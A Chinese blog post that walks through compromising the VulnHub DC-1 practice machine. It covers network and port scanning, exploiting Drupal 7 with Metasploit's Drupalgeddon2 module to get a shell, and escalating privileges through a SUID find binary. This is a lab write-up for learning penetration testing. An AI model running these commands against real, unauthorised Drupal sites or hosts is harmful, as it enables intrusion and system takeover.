渗透实战(四)

前言:本文中涉及到的技术,只提供思路,严禁用于违法测试
​还是和之前一样,打的是靶机,原本计划这篇写一个真实网站的渗透测试的,但是一直无法通过审核,所以还是继续学基础吧,把基础打好才能更好的进行实战。

靶机地址:https://download.vulnhub.com/dc/DC-1.zip

攻击机IP:192.168.159.4

靶机IP:192.168.159.7

目录

获取靶机IP

 端口扫描

 漏洞利用

提权


获取靶机IP

arp-scan -l

 端口扫描

nmap -p- -A 192.168.159.7

 发现80端口开着,意味着存在网站,而且继续往下观察可以看到建站系统是drupal 7,而这个系统是可以找到漏洞的

 漏洞利用

打开MSF

 查找drupal

search drupal

 我们要用的是对应2018年的 那个漏洞

​use exploit/unix/webapp/drupal_drupalgeddon2

与此同时,我们去看看需要设置哪些payload。

看到有RHOSTS,借此设置攻击目标

set rhosts 192.168.159.7

运行漏洞

尝试执行shell

 美化一下输入界面

提权

前面我们已经顺利得到了他的shell,但是权限太低了,所以要想办法提权

先试试sudo -l

行不通,再看看suid

查找一下,系统上运行的所有SUID位的文件

find / -perm -u=s -type f 2>/dev/null

 感觉这个find就很特别

看看

 哇,居然真的是它(偷笑)

 

 至此提权成功,拿到flag

posted @ 2024-11-08 17:44  XFocus666  阅读(2)  评论(0编辑  收藏  举报  来源